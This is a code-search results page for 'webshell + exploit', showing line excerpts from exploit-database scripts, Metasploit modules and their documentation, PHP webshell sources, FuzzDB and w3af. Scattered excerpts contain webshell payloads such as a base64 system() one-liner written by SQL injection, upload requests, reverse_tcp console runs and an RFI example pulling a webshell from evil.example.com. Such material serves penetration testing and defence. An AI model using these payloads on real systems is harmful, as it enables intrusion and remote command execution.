50+ results for 'webshell + exploit' (147 ms)
1#!/usr/bin/python
2# Lotus CMS Fraise v3.0 LFI - Remote Code Execution Exploit
3# greetz Tecr0C :0)
21#
22# exploit includes:
23# - Proxy support
35# | -------------------------------------------- |
36# | Lotus CMS v3.0 Remote Code Execution Exploit |
37# | by mr_me - net-ninja.net ------------------- |
38#
39# (+) Exploiting target @: 192.168.56.101/webapps/lotus/lcms/
40# (+) Testing proxy @ localhost:8080.. proxy is found to be working!
42# (+) Writing comment.. comment shell written sucessfully
43# (+) Writing webshell d8e8fca2dc0f896fd7cb4cb0031ba249.php to the webroot..
44# (+) Entering interactive remote console (q for quit)
caidao_php_backdoor_exec.rb https://gitlab.com/alx741/metasploit-framework | Ruby | 72 lines
8
9class Metasploit4 < Msf::Exploit::Remote
10 Rank = ExcellentRanking
11
12 include Msf::Exploit::Remote::HttpClient
13
17 'Description' => %q{
18 This module takes advantage of the China Chopper Webshell that is
19 commonly used by Chinese hackers.
26 ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html'],
27 ['URL', 'https://www.exploit-db.com/docs/27654.pdf'],
28 ['URL', 'https://www.us-cert.gov/ncas/alerts/TA15-313A']
61 if res && res.body =~ /#{flag}/m
62 Exploit::CheckCode::Vulnerable
63 else
README.md https://gitlab.com/MisterCh0c1/fuzzdb | Markdown | 92 lines
24**Attack Patterns -**
25Categorized by platform, language, and attack type, malicious and malformed inputs known to cause information leakage and exploitation have been collected into sets of test cases.
26FuzzDB contains comprehensive lists of [attack payloads](https://github.com/fuzzdb-project/fuzzdb/tree/master/attack-payloads) known to cause issues like OS command injection, directory listings, directory traversals, source exposure, file upload bypass, authentication bypass, http header crlf injections, and more.
33**Other useful stuff -**
34Webshells, common password and username lists, and some handy wordlists.
35(https://github.com/fuzzdb-project/fuzzdb/tree/master/web-backdoors) etc etc etc
58 * analysis of error messages
59 * researching old web exploits for repeatable attack strings
60 * scraping scanner payloads from http logs
80 * in training materials and documentation
81 * to learn about software exploitation techniques
82
caidao_php_backdoor_exec.rb https://gitlab.com/0072016/metasploit-framework-rapid7 | Ruby | 72 lines
8
9class MetasploitModule < Msf::Exploit::Remote
10 Rank = ExcellentRanking
11
12 include Msf::Exploit::Remote::HttpClient
13
17 'Description' => %q{
18 This module takes advantage of the China Chopper Webshell that is
19 commonly used by Chinese hackers.
26 ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html'],
27 ['URL', 'https://www.exploit-db.com/docs/27654.pdf'],
28 ['URL', 'https://www.us-cert.gov/ncas/alerts/TA15-313A']
61 if res && res.body =~ /#{flag}/m
62 Exploit::CheckCode::Vulnerable
63 else
emelco-1.2.php http://emelco.googlecode.com/svn/trunk/ | PHP | 1457 lines
17
18 EMelCo PHP WebShell v1.2
19 Escrita por >> s E t H <<
52 [+] Modificar leerarchivo() para que use shell() con cat
53 [+] Agregar rootexploits
54 [+] Agregar exploits de php
101
102$nombre = 'EMeLCo WebShell v1.2';
103
emelco-1.4.php http://emelco.googlecode.com/svn/trunk/ | PHP | 1800 lines
17
18 EMelCo PHP WebShell v1.4
19 Escrita por >> s E t H <<
48 [!] Arreglado un bug en el formulario para hacer chmod
49 [!] Si la version de php no esta afectada por el bug, no se muestra el checkbox para el exploit de ini_restore
50 [+] Funcion para borrarse a si misma
61 [!] Eliminar los mensajes de: "No se puede leer /var/log/messages porque supera los 50000 bytes", o ponerlos como link
62 [+] Agregar rootexploits
63 [+] Agregar exploits de php
106
107$nombre = 'EMeLCo WebShell v1.4';
108
emelco-1.3.php http://emelco.googlecode.com/svn/trunk/ | PHP | 1808 lines
17
18 EMelCo PHP WebShell v1.3
19 Escrita por >> s E t H <<
58 [!] Eliminar los mensajes de: "No se puede leer /var/log/messages porque supera los 50000 bytes", o ponerlos como link
59 [+] Agregar rootexploits
60 [+] Agregar exploits de php
101
102$nombre = 'EMeLCo WebShell v1.3';
103
25606.py https://bitbucket.org/DinoRex99/exploit-database.git | Python | 92 lines
1# Exploit Title: Kimai 0.9.2.1306-3 SQLi
2# Date: 05/20/2013
2# Date: 05/20/2013
3# Exploit Author: drone (@dronesec)
4# Vendor Homepage: http://www.kimai.org/
24
25def webshell(options, id):
26 """ dat webshell
55 if options.shell:
56 return webshell(options, id)
57
34431.html https://bitbucket.org/DinoRex99/exploit-database.git | HTML | 142 lines
4
5Successful exploit requires that the 'nagiosadmin' be logged into the web interface.
6
6
7Attackers can exploit these issues to gain unauthorized access to the affected application and perform certain administrative actions.
8
54
55Modify nagios command to create a webshell when run
56
24359.php https://bitbucket.org/DinoRex99/exploit-database.git | PHP | 119 lines
6
7Successful exploitation of this issue may allow an attacker to execute malicious script code on a vulnerable server.
8
23 YaPiG (http://yapig.sourceforge.net/) is a PHP Image Gallery script.
24 This Proof of Concept creates a small webshell script in the server
25 that we can use to exec commands in the server.
27 Then creates a crafted comment saved in a new .php file. This comment
28 contains an encoded webshell. Once this .php file is opened, the code
29 contained creates acidwebshell.php.
65
66/* This is my webshell script generator. It contains the webshell encoded
67 to avoid magic_quotes and urldecode altering the content of the script. */
83
84echo "[+] Creating WebShell Script ... ";
85
20342.php https://bitbucket.org/DinoRex99/exploit-database.git | PHP | 248 lines
2/*
3# Exploit Title: WespaJuris <= 3.0 auto exploit
4# Date: 07th august 2012
12
13Use this exploit to upload a webshell on vulnerable applications.
14Usage:
44 [!] Exploit complete.
45 [i] You have now a webshell in <http://localhost/juris/clientdir/30/dl/webshell.php>
46
46
47Then, go to http://localhost/juris/clientdir/30/dl/webshell.php and see your webshell.
48
48
49:: How this exploit works? Manually work.
50
8765.php https://bitbucket.org/DinoRex99/exploit-database.git | PHP | 97 lines
3print_r('
4******** IIS 6 WEBDAV Exploit.By racle@tian6.com && Securiteweb.org ********
5
91 sent($sock);
92 echo "Be cool,man! Webshell is http://".$host.$path."racle.asp";
93 die;}
nagios_xi_autodiscovery_webshell.md https://github.com/rapid7/metasploit-framework.git | Markdown | 226 lines
143[*] Auxiliary module execution completed
144msf6 auxiliary(scanner/http/nagios_xi_scanner) > use exploit/linux/http/nagios_xi_autodiscovery_webshell
145[*] Using configured payload linux/x86/meterpreter/reverse_tcp
145[*] Using configured payload linux/x86/meterpreter/reverse_tcp
146msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set target 0
147target => 0
197PASSWORD => labpass1
198msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set DELETE_WEBSHELL false
199DELETE_WEBSHELL => false
199DELETE_WEBSHELL => false
200msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set WEBSHELL_NAME lobster.php
201WEBSHELL_NAME => lobster.php
201WEBSHELL_NAME => lobster.php
202msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > run
203
18266.py https://bitbucket.org/DinoRex99/exploit-database.git | Python | 282 lines
32#
33# Exploit requirement:
34# --------------------
42# +==============================================================================================+
43# | Open Conference/Journal/Harvester Systems <= 2.3.X csrf/upload/remote code execution exploit |
44# | Found by: mr_me |
53#
54# (+) Exploit sent to the client target 127.0.0.1 attacking 192.168.220.134.
55# (-) Code injection and execution failed!
59#
60# (+) Exploit sent to the client target 127.0.0.1 attacking 192.168.220.134.
61# (!) Code injection worked!
61# (!) Code injection worked!
62# (!) Launching webshell..!
63#
pfsense_diag_routes_webshell.md https://github.com/rapid7/metasploit-framework.git | Markdown | 162 lines
28* Follow the installation instructions above
29* Do: `use exploit/unix/http/pfsense_diag_routes_webshell`
30* Do: `set username <name>`
78[*] Using configured payload bsd/x64/shell_reverse_tcp
79msf6 exploit(unix/http/pfsense_diag_routes_webshell) > set USERNAME diag_only
80USERNAME => diag_only
124USERNAME => diag_only
125msf6 exploit(unix/http/pfsense_diag_routes_webshell) > set PASSWORD labpass1
126PASSWORD => labpass1
128RHOST => 10.0.0.10
129msf6 exploit(unix/http/pfsense_diag_routes_webshell) > check
130
132[+] 10.0.0.10:80 - The target is vulnerable.
133msf6 exploit(unix/http/pfsense_diag_routes_webshell) > set LHOST 10.0.0.2
134LHOST => 10.0.0.2
16980.py https://bitbucket.org/DinoRex99/exploit-database.git | Python | 153 lines
2# ~INFORMATION
3# Exploit Title: If-CMS 2.07 Pre-Auth Local File Inclusion 0day Exploit
4# Author: TecR0c
48|----------------------------------------|
49|Exploit: If-CMS 2.07 LFI RCE
50|Author: %s
99
100def postRequestWebShell(encodedCommand):
101 webSiteUrl = url.geturl()+'.shell.php'
134 encodedCommand = base64.b64encode(command)
135 response = postRequestWebShell(encodedCommand)
136 print response
138 encodedCommand = base64.b64encode('rm .shell.php')
139 postRequestWebShell(encodedCommand)
140 print "\n[!] Removed .shell.php\n"
nagios_xi_magpie_debug.rb https://github.com/rapid7/metasploit-framework.git | Ruby | 246 lines
5
6class MetasploitModule < Msf::Exploit::Remote
7 Rank = ExcellentRanking
8
9 include Msf::Exploit::EXE
10 include Msf::Exploit::FileDropper
10 include Msf::Exploit::FileDropper
11 include Msf::Exploit::Remote::HttpClient
12 include Msf::Exploit::Remote::HttpServer::HTML
12 include Msf::Exploit::Remote::HttpServer::HTML
13 prepend Msf::Exploit::Remote::AutoCheck
14
20 'Description' => %q{
21 This module exploits two vulnerabilities in Nagios XI <= 5.5.6:
22 CVE-2018-15708 which allows for unauthenticated remote code execution
make_deb.sh https://bitbucket.org/jarrettchisholm/oscar.git | Shell | 484 lines
61# v 24 - Updated reOscar to reOscar2.sh, added ichppccode table, missig HRMDocuments column and many indices to patch.sql
62# v 25 - More indices added to patch.sql and web.xml added to OscarDocuments and moved OscarDocuments to prevent webshell exploit
63# v 26 - Updated Rich Text Letter and moved OscarDocuments to prevent webshell exploit
39982.rb https://bitbucket.org/DinoRex99/exploit-database.git | Ruby | 69 lines
1# Exploit Title: Airia - Webshell Upload Vulnerability
2# Date: 2016-06-20
2# Date: 2016-06-20
3# Exploit Author: HaHwul
4# Exploit Author Blog: www.hahwul.com
13if ARGV.length !=2
14puts "Airia Webshell Upload Exploit(Vulnerability)"
15puts "Usage: #>ruby airia_ws_exploit.rb [targetURL] [phpCode]"
18puts " Example : ~~.rb http://127.0.0.1/vul_test/airia 'echo zzzz'"
19puts " exploit & code by hahwul[www.hahwul.com]"
20
35request["Content-Type"] = "application/x-www-form-urlencoded"
36request.set_form_data({"mode"=>"save",""=>"","file"=>"shell.php","scrollvalue"=>"","contents"=>"<?php echo 'Airia Webshell Exploit';#{shell};?>","group"=>"vvv_html"})
37response = http.request(request)
49
50output: Airia Webshell Exploit123
51
19007.php https://bitbucket.org/DinoRex99/exploit-database.git | PHP | 126 lines
1<?php
2# Exploit Title: PHPNet <= 1.8 (ler.php) SQL Injection
3# Exploit Author: WhiteCollarGroup
15 ~> SQL Injection
16This exploit is for a vulnerability in ler.php, but are the same vulnerability on imprimir.php and imagem.php.
17ler.php?id=[SQLi]
32 After open administration panel, try to add a new article.
33 Use the upload form to upload your webshell.
34 After posting, access:
62
63echo "PHPNet <= 1.8 SQLi Exploit\n";
64echo "Discovered by WhiteCollarGroup\n";
118 if($i==0) {
119 echo "[-] Exploit failed. Make sure that's server is using a valid version of PHPNet without mod_security. We're sorry.";
120 } else {
36202.py https://bitbucket.org/DinoRex99/exploit-database.git | Python | 330 lines
5# Seagate Business NAS pre-authentication remote code execution
6# exploit as root user.
7#
17# - -c : (optional) create a cookie which will give admin access.
18# Not specifying this flag results in webshell installation.
19# - ua : (optional) the user agent used by the browser for the
60hostname = ''
61webshell = str(uuid.uuid1()) + ".php"
62
195
196 url = 'http://{0}:{1}/{2}'.format(host, port, webshell)
197 req = urllib2.Request(url, headers = headers, data = post_data)
226 print ""
227 print "Seagape v1.0 -- Interactive Seagate NAS Webshell"
228 print " - OJ Reeves (@TheColonial) - https://beyondbinary.io/"
caidao_php_backdoor_exec.rb https://github.com/rapid7/metasploit-framework.git | Ruby | 69 lines
5
6class MetasploitModule < Msf::Exploit::Remote
7 Rank = ExcellentRanking
8
9 include Msf::Exploit::Remote::HttpClient
10
14 'Description' => %q{
15 This module takes advantage of the China Chopper Webshell that is
16 commonly used by Chinese hackers.
23 ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html'],
24 ['URL', 'https://www.exploit-db.com/docs/27654.pdf'],
25 ['URL', 'https://www.cisa.gov/uscert/ncas/alerts/TA15-313A']
58 if res && res.body =~ /#{flag}/m
59 Exploit::CheckCode::Vulnerable
60 else
17003.py https://bitbucket.org/DinoRex99/exploit-database.git | Python | 202 lines
2# ~INFORMATION
3# Exploit Title: iCMS v1.1 Admin SQLi/bruteforce Exploit
4# Author: TecR0c
45sitePath = '/var/www/iCMS/icms/'
46webshell = '<?php+system(base64_decode($_REQUEST[cmd]));?>'
47
65|----------------------------------------|
66|Exploit: iCMS SQLi RCE
67|Author: %s
151 "admin/item_detail.php?id=1+UNION+SELECT+NULL,'TECR0CSHELL"\
152 +webshell+"LLEHSC0RCET'+INTO+OUTFILE+'"+sitePath+".webshell.php'"
153 opener.open(webSiteUrl)
153 opener.open(webSiteUrl)
154 print '[+] Wrote WEBSHELL !'
155 else:
44825.html https://bitbucket.org/DinoRex99/exploit-database.git | HTML | 33 lines
1# Exploit Title: GreenCMS v2.3.0603 CSRF vulnerability get webshell
2# Date: 2018-06-02
2# Date: 2018-06-02
3# Exploit Author: xichao
4# Vendor Homepage: https://github.com/GreenCMS/GreenCMS
24 <input type="hidden" name="content" value="<?php phpinfo();?>">
25 <button type="submit" value="Submit">WebShell</button>
26 </form>
22128.c https://bitbucket.org/DinoRex99/exploit-database.git | C | 239 lines
2
3A vulnerability has been discovered in H-Sphere Webshell. During the pre-authentication phase Webshell fails to perform sufficient bounds checking on user-supplied HTTP parameters. As a result, a malicious attacker may be able to trigger a buffer overrun.
4
9/*
10 * Local r00t exploit for Webshell 2.4 (possibly other versions).
11 * Vulnerability found and exploit written by Carl Livitt
49#define SHELLSCRIPT_FILE "/tmp/zz"
50#define EXPLOIT_FILE "/tmp/.webshell.txt"
51#define ROOT_SHELL "/tmp/rs"
130 if((pid=fork())==0) {
131 system(WEBSHELL_PROGRAM" < "EXPLOIT_FILE" &>/dev/null");
132 exit(0);
167 if((fp=fopen(EXPLOIT_FILE,"w"))==NULL) {
168 printf("Could not create exploit file %s\n", EXPLOIT_FILE);
169 exit(1);
22454.c https://bitbucket.org/DinoRex99/exploit-database.git | C | 339 lines
174 }
175 send(websock, exploit_buf, strlen(exploit_buf), 0);
176 //len=recv(websock, buf, sizeof(buf)-1, 0);
264 sprintf(exploit_buf,"GET %s HTTP/1.1\n",location);
265 sprintf(exploit_buf,"%sHost: %s\n",exploit_buf,target);
266 sprintf(exploit_buf,"%sAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1\n", exploit_buf);
266 sprintf(exploit_buf,"%sAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1\n", exploit_buf);
267 sprintf(exploit_buf,"%sAccept-Language: en-gb, en;q=0.66, en-us;q=0.33\n", exploit_buf);
268 sprintf(exploit_buf,"%sAccept-Encoding: gzip, deflate, compress;q=0.9\n", exploit_buf);
268 sprintf(exploit_buf,"%sAccept-Encoding: gzip, deflate, compress;q=0.9\n", exploit_buf);
269 sprintf(exploit_buf,"%sAccept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66\n", exploit_buf);
270 sprintf(exploit_buf,"%sCookie: ck_ams=00000; ck_amsv=11043763620; ck_sid=3J4EUD0l4Juf1ev-06103517452.aa\n", exploit_buf);
270 sprintf(exploit_buf,"%sCookie: ck_ams=00000; ck_amsv=11043763620; ck_sid=3J4EUD0l4Juf1ev-06103517452.aa\n", exploit_buf);
271 sprintf(exploit_buf,"%sAccept-Encoding: %s\n\n",exploit_buf, sc);
272 //printf("%s\n\n", exploit_buf);
dlink_central_wifimanager_sqli.md https://github.com/rapid7/metasploit-framework.git | Markdown | 180 lines
2
3This module exploits a vulnerability in Dlink Central
4WifiManager (CWM-100), found in versions lower than
31- set action ...
32- `check` or `exploit`
33- should work as in the scenarios below
179(copy ... to ...), but using full paths, the attacker must know the path of the webroot
180to upload a webshell this way.
181
19060.php https://bitbucket.org/DinoRex99/exploit-database.git | PHP | 132 lines
1<?php
2# Exploit Title: TheBlog <= 2.0 SQL Injection
3# Exploit author: WhiteCollarGroup
43 After get admin access, on the menu, click "Upload".
44 Upload your webshell on the form. A link will be appears on file list ("Lista de Arquivos").
45
45
46 > What's this exploit?
47 Are a PoC for SQL Injection on "index.php?id=".
48 How to use:
49 php exploit.php <target>
50 Example:
50 Example:
51 php exploit.php http://target.com/blog/
52
lrfi.html https://bitbucket.org/rmusser/infosec-reference.git | HTML | 186 lines
107 <br />
108 /vulnerable.php?COLOR=http://evil.example.com/webshell.txt?
109 <br />
112 <br />
113 /vulnerable.php?COLOR=C:\\ftp\\upload\\exploit
114 <br />
114 <br />
115 Executes code from an already uploaded file called exploit.php (local
116 file inclusion vulnerability)
141 <li>
142 <a href="http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/">
143 Exploiting PHP File Inclusion – Overview « Reiners’ Weblog
zimbra_xxe_rce.md https://github.com/rapid7/metasploit-framework.git | Markdown | 48 lines
2
3This module exploits an XML external entity vulnerability and a server side request forgery to get unauthenticated code execution on Zimbra Collaboration Suite. The XML external entity vulnerability in the Autodiscover Servlet is used to read a Zimbra configuration file that contains an LDAP password for the 'zimbra' account. The zimbra credentials are then used to get a user authentication cookie with an AuthRequest message. Using the user cookie, a server side request forgery in the Proxy Servlet is used to proxy an AuthRequest with the 'zimbra' credentials to the admin port to retrieve an admin cookie. After gaining an admin cookie the ClientUploader is used to upload a JSP webshell that can be triggered from the web server to get command execution on the host. The issues reportedly affect Zimbra Collaboration Suite v8.5 to v8.7.11. This module was tested with Zimbra Release 8.7.1.GA.1670.UBUNTU16.64 UBUNTU16_64 FOSS edition.
4
151. `./msfconsole -q`
162. `use exploit/linux/http/zimbra_xxe_rce`
173. `set rhosts <rhost>`
184. `set lhost <lhost>`
195. `exploit`
20
25```
26msf5 exploit(linux/http/zimbra_xxe_rce) > exploit
27
shopware_createinstancefromnamedarguments_rce.rb https://github.com/rapid7/metasploit-framework.git | Ruby | 283 lines
5
6class MetasploitModule < Msf::Exploit::Remote
7 Rank = ExcellentRanking
8
9 include Msf::Exploit::Remote::HttpClient
10 include Msf::Exploit::FileDropper
15 'Description' => %q(
16 This module exploits a php object instantiation vulnerability that can lead to RCE in
17 Shopware. An authenticated backend user could exploit the vulnerability.
21
22 An attacker can leverage this to deserialize an arbitrary payload and write a webshell to
23 the target system, resulting in remote code execution.
36 ['CVE', '2017-18357'], # not really because we bypassed this patch
37 ['URL', 'https://blog.ripstech.com/2017/shopware-php-object-instantiation-to-blind-xxe/'] # initial writeup w/ limited exploitation
38 ],
pfsense_diag_routes_webshell.rb https://github.com/rapid7/metasploit-framework.git | Ruby | 227 lines
84 OptString.new('WEBSHELL_NAME', [false, 'The name of the uploaded webshell. This value is random if left unset', nil]),
85 OptBool.new('DELETE_WEBSHELL', [true, 'Indicates if the webshell should be deleted or not.', true])
86 ]
151 def drop_webshell
152 webshell_location = normalize_uri(target_uri.path, "#{@webshell_uri}#{@webshell_name}")
153 print_status("Uploading webshell to #{webshell_location}")
181 if datastore['DELETE_WEBSHELL']
182 register_file_for_cleanup("#{@webshell_path}#{@webshell_name}")
183 end
197 'method' => 'GET',
198 'uri' => normalize_uri(target_uri.path, "#{@webshell_uri}#{@webshell_name}"),
199 'vars_get' => {
214 # create a randomish web shell name if the user doesn't specify one
215 @webshell_name = datastore['WEBSHELL_NAME'] || "#{Rex::Text.rand_text_alpha(5..12)}.php"
216
22129.c https://bitbucket.org/DinoRex99/exploit-database.git | C | 325 lines
11/*
12 * Remote r00t exploit for Webshell 2.4 (possibly other versions).
13 * Vulnerability found and exploit written by Carl Livitt
30gcc -o webshell-remote webshell-remote.c
31./webshell-remote -t www.host-to-exploit.com -l /path/to/webshell
32
101"-P port Port to bind shell on remote host [10000]\n"
102"-l location Location of webshell (eg. /cgi-bin/webshell)\n\n"
103"Example:\n\n"
287 sprintf(exploit_buf,"%sAccept-Encoding: %s\n",exploit_buf, sc);
288 sprintf(exploit_buf,"%s%s\n",exploit_buf,egg);
289 sprintf(exploit_buf,"%sContent-Length: %d\n\n",exploit_buf,EGG_SIZE*2);
290 sprintf(exploit_buf,"%s--%s\n",exploit_buf, egg+CONTENT_LENGTH);
291 sprintf(exploit_buf,"%sContent-Disposition: form-data; name=\"TESTNAME\"; filename=\"TESTFILENAME\"\r\n\r\n",exploit_buf);
292 sprintf(exploit_buf,"%s%-*s\n",exploit_buf, EGG_SIZE*4," ");
9556.php https://bitbucket.org/DinoRex99/exploit-database.git | PHP | 37 lines
3+---------------------------------------------------------------------------+
4osCommerce Online Merchant 2.2 RC2a RCE Exploit
5by Flyh4t
9Gr44tz to q1ur3n ã€puret_tã€ukã€toby57 and all the other members of WST
10Thx to exploits of blackh
11+---------------------------------------------------------------------------+
33fputs($fd,$message);
34echo ("[+]Go to see U webshell : $host/fly.php");
35?>
nagios_xi_autodiscovery_webshell.rb https://github.com/rapid7/metasploit-framework.git | Ruby | 238 lines
89 OptInt.new('DEPTH', [true, 'The depth of the path traversal', 10]),
90 OptString.new('WEBSHELL_NAME', [false, 'The name of the uploaded webshell. This value is random if left unset', nil]),
91 OptBool.new('DELETE_WEBSHELL', [true, 'Indicates if the webshell should be deleted or not.', true])
148 # drop a basic web shell on the server
149 webshell_location = normalize_uri(target_uri.path, "#{@webshell_uri}#{@webshell_name}")
150 print_status("Uploading webshell to #{webshell_location}")
181 if datastore['DELETE_WEBSHELL']
182 register_file_for_cleanup("#{@webshell_path}#{@webshell_name}")
183 end
196 'mode' => 'deletejob',
197 'job' => "#{'../' * datastore['DEPTH']}#{@webshell_path}#{@webshell_name}"
198 }
223 # create a randomish web shell name if the user doesn't specify one
224 @webshell_name = datastore['WEBSHELL_NAME'] || "#{Rex::Text.rand_text_alpha(5..12)}.php"
225
rce_check.rb https://github.com/rapid7/metasploit-framework.git | Ruby | 93 lines
20 if version < Rex::Version.new(fixed_version)
21 matching_exploits = add_cve_module_to_hash(matching_exploits, info)
22 end
30 if version == Rex::Version.new(fixed_version)
31 matching_exploits = add_cve_module_to_hash(matching_exploits, info)
32 end
66 if version >= lower && version <= higher
67 matching_exploits = add_cve_module_to_hash(matching_exploits, info)
68 end
76 #
77 # @param matching_exploits [Hash] maps CVE numbers to exploit module names
78 # @param cve_module_array [Array] contains arrays with a CVE number at index 0 and a matching exploit at index 1
78 # @param cve_module_array [Array] contains arrays with a CVE number at index 0 and a matching exploit at index 1
79 # @return [Hash] updated list of matching exploits, mapping CVE numbers to exploit module names
80 def add_cve_module_to_hash(matching_exploits, cve_module_array)
17510.py https://bitbucket.org/DinoRex99/exploit-database.git | Python | 91 lines
2# coding=utf-8
3# pma3 - phpMyAdmin3 remote code execute exploit
4# Author: wofeiwo<wofeiwo@80sec.com>
19 print "PMA3 (Version below 3.3.10.2 and 3.4.3.1) remote code
20execute exploit"
21 print "Usage: %s <PMA_url>" % program
63 # ����setup��ȡshell
64 print "[+] Trying get webshell.."
65 postdata =
85 else:
86 print "[-] Cannot get webshell."
87
39691.py https://bitbucket.org/DinoRex99/exploit-database.git | Python | 105 lines
1# Exploit Title: Oracle Application Testing Suite Authentication Bypass and Arbitrary File Upload Remote Exploit
2# Exploit Author: Zhou Yu <504137480@qq.com >
19
20webshell_content='''
21<%@ page import="java.util.*,java.io.*" %>
42post_data = post_data + "Content-Disposition: form-data; name=\"fileName1\"\r\n"
43post_data = post_data + "\r\nwebshell.jsp\r\n"
44post_data = post_data + "--" + boundary + "\r\n"
56post_data = post_data + "--" + boundary + "\r\n"
57post_data = post_data + "Content-Disposition: form-data; name=\"file1\"; filename=\"webshell.jsp\"\r\n"
58post_data = post_data + "Content-Type: text/plain\r\n"
58post_data = post_data + "Content-Type: text/plain\r\n"
59post_data = post_data + "\r\n" + webshell_content +"\r\n"
60post_data = post_data + "--" + boundary + "\r\n"
75 print "[+]upload done!"
76 webshellurl = "http://" + ip + ":" + str(port) + "/olt/pages/webshell.jsp"
77 print "[+]wait a moment,detecting whether the webshell exists..."
exchange_proxyshell_rce.md https://github.com/rapid7/metasploit-framework.git | Markdown | 142 lines
25 1. If no email address is specified
26 1. The exploit will leverage the SSRF to issue a reques to EWS and enumerate the email addresses
27 * This technique was taken from [dmassland/proxyshell-poc](https://github.com/dmaasland/proxyshell-poc/blob/main/proxyshell-enumerate.py)
31 * Email addresses are mapped to SIDs using a request to autodiscover and MAPI
321. A draft email is saved to the identified user's mailbox containing an encoded webshell embedded within an attachment
331. The `New-MailboxExportRequest` cmdlet is used to export the attachment and write the webshell to an accessible location
331. The `New-MailboxExportRequest` cmdlet is used to export the attachment and write the webshell to an accessible location
341. The exploit waits for the webshell to be written and uses it to execute OS commands
351. The webshell*, export request and draft email are all removed
94```
95msf6 > use exploit/windows/http/exchange_proxyshell_rce
96[*] Using configured payload windows/x64/meterpreter/reverse_tcp
104[+] 192.168.159.42:443 - The target is vulnerable.
105msf6 exploit(windows/http/exchange_proxyshell_rce) > exploit
106
zimbra_xxe_rce.rb https://github.com/rapid7/metasploit-framework.git | Ruby | 258 lines
5
6class MetasploitModule < Msf::Exploit::Remote
7 Rank = ExcellentRanking
8
9 include Msf::Exploit::Remote::HttpClient
10 include Msf::Exploit::Remote::HttpServer
10 include Msf::Exploit::Remote::HttpServer
11 include Msf::Exploit::FileDropper
12
16 'Description' => %q{
17 This module exploits an XML external entity vulnerability and a
18 server side request forgery to get unauthenticated code execution
26 cookie. After gaining an admin cookie the Client Upload servlet is
27 used to upload a JSP webshell that can be triggered from the web
28 server to get command execution on the host. The issues reportedly
vmware_vcenter_uploadova_rce.md https://github.com/rapid7/metasploit-framework.git | Markdown | 179 lines
10Note that later vulnerable versions of the Linux appliance aren't
11exploitable via the webshell technique. Furthermore, writing an SSH
12public key to `/home/vsphere-ui/.ssh/authorized_keys` works, but the
47patched. Later vulnerable versions of the Linux appliance aren't
48exploitable via the webshell technique. I haven't been able to download
49and test them all. Sorry.
90```
91msf6 > use exploit/multi/http/vmware_vcenter_uploadova_rce
92[*] Using configured payload java/jsp_shell_reverse_tcp
92[*] Using configured payload java/jsp_shell_reverse_tcp
93msf6 exploit(multi/http/vmware_vcenter_uploadova_rce) > options
94
115
116Exploit target:
117
vmware_vcenter_uploadova_rce.rb https://github.com/rapid7/metasploit-framework.git | Ruby | 236 lines
5
6class MetasploitModule < Msf::Exploit::Remote
7
10
11 prepend Msf::Exploit::Remote::AutoCheck
12 include Msf::Exploit::Remote::CheckModule
12 include Msf::Exploit::Remote::CheckModule
13 include Msf::Exploit::Remote::HttpClient
14 include Msf::Exploit::FileDropper
21 'Description' => %q{
22 This module exploits an unauthenticated OVA file upload and path
23 traversal in VMware vCenter Server to write a JSP payload to a
27 Note that later vulnerable versions of the Linux appliance aren't
28 exploitable via the webshell technique. Furthermore, writing an SSH
29 public key to /home/vsphere-ui/.ssh/authorized_keys works, but the
caidao_php_backdoor_exec.md https://bitbucket.org/DinoRex99/metasploit-framework.git | Markdown | 44 lines
1China Chopper Caidao PHP Backdoor or simply [Chinese Caidao](https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html) is a webshell manager coded in PHP.
2
10 2. Start msfconsole
11 3. Do: `use exploit/multi/http/caidao_php_backdoor_exec`
12 4. Do: `set rport port`
17```
18 8. Do: `exploit`
19 9. You should get a shell.
33```
34msf exploit(caidao_php_backdoor_exec) > exploit
35
shell_handler.py https://github.com/andresriancho/w3af.git | Python | 171 lines
36
37def get_webshells(extension, force_extension=False):
38 """
38 """
39 This method returns a webshell content to be used in exploits, based on
40 the extension, or based on the x-powered-by header.
45 """
46 return _get_file_list('webshell', extension, force_extension)
47
54 """
55 Similar to get_webshells but returns a code that when it is evaluated runs
56 `command` in the operating system.
58 Example:
59 get_webshells() returns:
60 "<? system( $_GET['cmd'] ) ?>"
dav.py https://github.com/andresriancho/w3af.git | Python | 191 lines
57
58 Then the exploit plugin that exploits os_commanding
59 ( attack.os_commanding ) should return 'os_commanding' in this method.
114 om.out.debug(msg)
115 self._exploit_url = exploit_url
116 return True
127 :return: This method returns the probability of getting a root shell
128 using this attack plugin. This is used by the "exploit *"
129 function to order the plugins and first try to exploit the
129 function to order the plugins and first try to exploit the
130 more critical ones. This method should return 0 for an exploit
131 that will never return a root shell, and 1 for an exploit that
153
154 self.exploit_url = exploit_url
155
nagios_xi_magpie_debug.md https://github.com/rapid7/metasploit-framework.git | Markdown | 100 lines
2
3This module exploits two vulnerabilities in Nagios XI <= 5.5.6:
4CVE-2018-15708 which allows for unauthenticated remote code execution
8
9The exploit works as follows:
10
14 - The `RSRVHOST` and `RSRVPORT` options are used to specify the HTTPS server host and port.
15- A PHP webshell and payload executable are uploaded via `magpie_debug.php`.
16- A command is executed via the webshell. This command elevates privileges and runs the payload executable.
321. `msfconsole`
331. `use exploit/linux/http/nagios_xi_magpie_debug`
341. `set RHOSTS [IP]`
351. `set RSRVHOST [IP]`
361. `exploit`
371. You should get a new session with *root* privileges
file_upload.py https://github.com/andresriancho/w3af.git | Python | 224 lines
55
56 Then the exploit plugin that exploits os_commanding
57 ( attack.os_commanding ) should return 'os_commanding' in this method.
68
69 if exploit_url is not None:
70
